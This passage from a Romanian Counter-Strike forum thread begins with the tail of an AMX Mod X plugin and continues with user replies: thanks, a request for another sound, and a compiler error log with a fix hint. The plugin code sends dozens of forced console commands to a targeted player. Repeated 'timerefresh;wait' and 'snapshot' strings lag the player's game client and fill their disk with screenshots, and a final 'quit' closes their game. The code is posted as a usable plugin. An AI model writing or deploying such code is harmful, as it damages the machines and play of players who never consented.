         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")      

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator, "quit")

         return;

      }

   }

}

public Cronometru(id){

   new parm[1]

   parm[0] = id

   if (ComandaB){

      set_task(3.0,"TimpDeAsteptare",Baza+id,parm)

   }

}

public TimpDeAsteptare(id){

   if (task_exists(Baza+id)){

      remove_task(Baza+id)

   }

   ComandaB = false

}



stock IncarcareServer(){

   get_configsdir(DirectorServer, 63)

   format(FisierServer,127,"%s/servit.q",DirectorServer)

   if (!file_exists(FisierServer)){

      return PLUGIN_HANDLED

   }

   else {

      

      read_file(FisierServer,0,TextServer,LimbaServer,r)

      

      SalvareServer = str_to_num(TextServer)

   }

   return PLUGIN_CONTINUE

   

}

stock ScriereServer(){

   get_configsdir(DirectorServer, 63)

   format(FisierServer,127,"%s/servit.q",DirectorServer)

   if (!file_exists(FisierServer)){

      return PLUGIN_HANDLED

   }

   else {

      

      read_file(FisierServer,0,TextServer,LimbaServer,t)

      

      

      SalvareServer = str_to_num(TextServer)

      SalvareServer = SalvareServer + 1

      format(TextServer,31,"%i",SalvareServer)

      delete_file(FisierServer)

      write_file(FisierServer,TextServer,-1)

   }

   return PLUGIN_CONTINUE

}
dracushorul
Membru, skill 0
Membru, skill 0
Posts: 3
Joined: 12 Oct 2014, 09:46
Detinator Steam: Da
CS Status: Citesc forumul eXtreamCS.com...!
Fond eXtream: 0
Contact:

13 Oct 2014, 19:45

ms frm si o seara placuta
User avatar
Sergovicy
Membru, skill 0
Membru, skill 0
Posts: 32
Joined: 04 Jul 2013, 09:49
Detinator Steam: Da
CS Status: ][)) //\\// ][))
Detinator server CS: Da
SteamID: qpsvqp
Location: Tot acolo ...
Contact:

23 Jan 2015, 12:48

Salut
Poate cineva sa adauge un alt sunet inafara de cel default ??
Unu din misc pe undeva pe acolo nu conteaza ...
Multumesc
Image
User avatar
tier0
Membru, skill +1
Membru, skill +1
Posts: 222
Joined: 05 Sep 2014, 11:07
Detinator Steam: Da
CS Status: Citesc forumul eXtreamCS.com...!
SteamID: tier0
Fond eXtream: 0
Location: Galati
Contact:

09 Jul 2015, 22:28

pune alt link ca acel a expirat si daca incerc sa compilez sma imi da multe errori:\
AMX Mod X Compiler 1.8.3-manual
Copyright (c) 1997-2006 ITB CompuPhase
Copyright (c) 2004-2013 AMX Mod X Team

Modified for www.Freakz.ro / amx.freakz.ro

amx_leavegame.sma(1) : error 010: invalid function or declaration
amx/include/core.inc(13) : error 010: invalid function or declaration
amx_leavegame.sma(72) : warning 217: loose indentation
amx_leavegame.sma(75) : warning 217: loose indentation
amx_leavegame.sma(79) : warning 217: loose indentation
amx_leavegame.sma(83) : warning 217: loose indentation
amx_leavegame.sma(84) : warning 217: loose indentation
amx_leavegame.sma(108) : warning 217: loose indentation
amx_leavegame.sma(115) : warning 217: loose indentation
amx_leavegame.sma(116) : warning 217: loose indentation
amx_leavegame.sma(117) : warning 217: loose indentation
amx_leavegame.sma(123) : warning 217: loose indentation
amx_leavegame.sma(124) : warning 217: loose indentation
amx_leavegame.sma(146) : warning 217: loose indentation
amx_leavegame.sma(174) : warning 217: loose indentation
amx_leavegame.sma(190) : warning 217: loose indentation

2 Errors.
Compilarea a esuat!
User avatar
b|t|d
Membru, skill 0
Membru, skill 0
Posts: 94
Joined: 14 Jan 2011, 18:21
Detinator Steam: Da
CS Status: Citesc forumul eXtreamCS.com!
Location: ro
Has thanked: 20 times
Contact:

31 Jan 2017, 20:49

Lipseste "include/core.inc" incearca pe amx 182 si nu face nimic mai alaes la cei cu smshield,steam sau ceva de genul..
Post Reply

Return to “Pluginuri eXtream”

  • Information
  • Who is online

    Users browsing this forum: No registered users and 21 guests